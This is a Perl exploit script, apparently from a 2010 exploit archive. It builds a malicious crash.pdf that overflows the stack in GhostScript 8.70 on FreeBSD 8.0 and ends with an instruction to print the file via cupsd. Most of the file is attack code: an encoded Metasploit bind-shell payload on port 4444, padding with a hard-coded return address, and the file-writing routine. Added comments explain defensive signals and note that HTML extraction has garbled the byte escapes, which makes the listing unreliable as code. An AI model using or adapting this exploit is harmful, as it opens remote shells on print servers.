==================================================
GhostScript PostScript File Stack Overflow Exploit
==================================================

##########################################################################
# Check Point Software Technologies – Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco – <rbranco *noSPAM* checkpoint.com> #
# #
# GhostScript Stack Overflow #
# #
##########################################################################

# bsd/x86/shell_bind_tcp – 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
# $buf holds the encoded payload described by the header comment above: per
# that header, a Metasploit-generated bsd/x86 bind shell (214 bytes, encoded
# with x86/alpha_upper) configured with LPORT=4444.
# Defender note: LPORT is a generator option, so 4444/tcp is not a stable
# indicator on its own; the more durable signal is a print-filter or
# Ghostscript process that opens a listening socket or spawns a shell.
# NOTE(review): this listing is an HTML extraction (quotes appear as entities
# and the byte escapes are altered), so treat it as reference material for
# analysis rather than as a runnable script.
my $buf =
&quot;x54×5axdaxd1xd9×72xf4×5ax4ax4ax4ax4ax4ax43&quot; .
&quot;x43×43x43×43x43×52x59×56x54×58x33×30x56×58&quot; .
&quot;x34×41x50×30x41×33x48×48x30×41x30×30x41×42&quot; .
&quot;x41×41x42×54x41×41x51×32x41×42x32×42x42×30&quot; .
&quot;x42×42x58×50x38×41x43×4ax4ax49×50x31×49x50&quot; .
&quot;x46×30x45×38x4bx4fx44×42x42×31x51×4cx4dx59&quot; .
&quot;x4bx57×50x50×43x5ax45×51x42×4ax44×42x42×4a&quot; .
&quot;x44×50x4ex50×45x31×48x4dx4bx30×51x47×46x30&quot; .
&quot;x46×30x43×5ax45×38x51×48x48×4dx4bx30×4dx59&quot; .
&quot;x51×57x4ax4cx48×30x43×5ax48×4dx4dx50×4ex50&quot; .
&quot;x45×4ex48×4dx4dx50×50x50×50x50×43x5ax51×4a&quot; .
&quot;x50×58x48×4dx4dx50×4bx4fx50×4fx4ax44×43x49&quot; .
&quot;x4bx46×46x30×42x48×46x4fx46×4fx44×33x42×48&quot; .
&quot;x43×58x46×4fx43×52x45×39x42×4ex4bx39×4bx53&quot; .
&quot;x46×30x46×34x50×53x50×50x48×30x47×4bx48×4d&quot; .
&quot;x4dx50×41x41&quot;;

# $pkt is the complete file body, concatenated in this order: a short leading
# marker string, 500 'A' filler bytes and a fixed pattern string, a 4-byte
# value the author labels "Shellcode Addr", further filler around a second
# 4-byte value, a 2-byte sequence repeated 100 times, 'C' padding sized so
# that the padding plus $buf occupies 1200 bytes, $buf itself, and 100 'Z'
# bytes.
# $pkt is assigned without `my`, so it is a package global; no `use strict`
# is visible in this listing.
# Defender note: the literal address means the file presumes a predictable,
# executable stack on the target. Stack protectors, a non-executable stack
# and address-space randomization each break that assumption.
# NOTE(review): that reading is inferred from the hard-coded value and the
# author's label; confirm against the vendor advisory.
$pkt = &quot;e!PS&quot;.
&quot;A&quot; x 500 . &quot;00001111222233334444555556666777788889999aaa&quot;.
&quot;x40xd9xbfxbf&quot;. #Shellcode Addr
&quot;bccccddd&quot;.
&quot;xefxbexbfxbf&quot;.
&quot;ffff&quot;.
&quot;xffxbf&quot; x 100 .
&quot;C&quot; x (1200 – length($buf)) . $buf . &quot;Z&quot; x 100;

# Banner on STDERR. It states the tested target as GhostScript 8.70 on
# FreeBSD 8.0, which is the version/platform scope a defender should check
# first when triaging exposure.
print STDERR &quot;Check Point Vulnerability Discovery Team (VDT)n&quot;;
print STDERR &quot;GhostScript 8.70 exploit for FreeBSD 8.0!n&quot;;
print STDERR &quot;Rodrigo Rubira Branco (BSDaemon)n&quot;;

print STDERR &quot;nCreating evil pdf …&quot;;

# Writes $pkt to crash.pdf in the current working directory; the '>' mode
# truncates any existing file of that name.
# NOTE(review): two-argument open with a bareword handle, and neither open
# nor close is checked, so a failed write is reported as success below.
open(F,&quot;&gt;crash.pdf&quot;);

print F $pkt;

close(F);

print STDERR &quot; d0ne!n&quot;;
# The closing message names the print service (cupsd) as the delivery path.
# Defender note: presumably the print filter chain hands the job to
# Ghostscript (confirm for the deployment). Print servers therefore need a
# patched Ghostscript, restricted job submission, and filters that run with
# least privilege.
print &quot;Now print it via cupsd!n&quot;;

# Inj3ct0r.com [2010-07-18]
Source: http://inj3ct0r.com/exploits/13394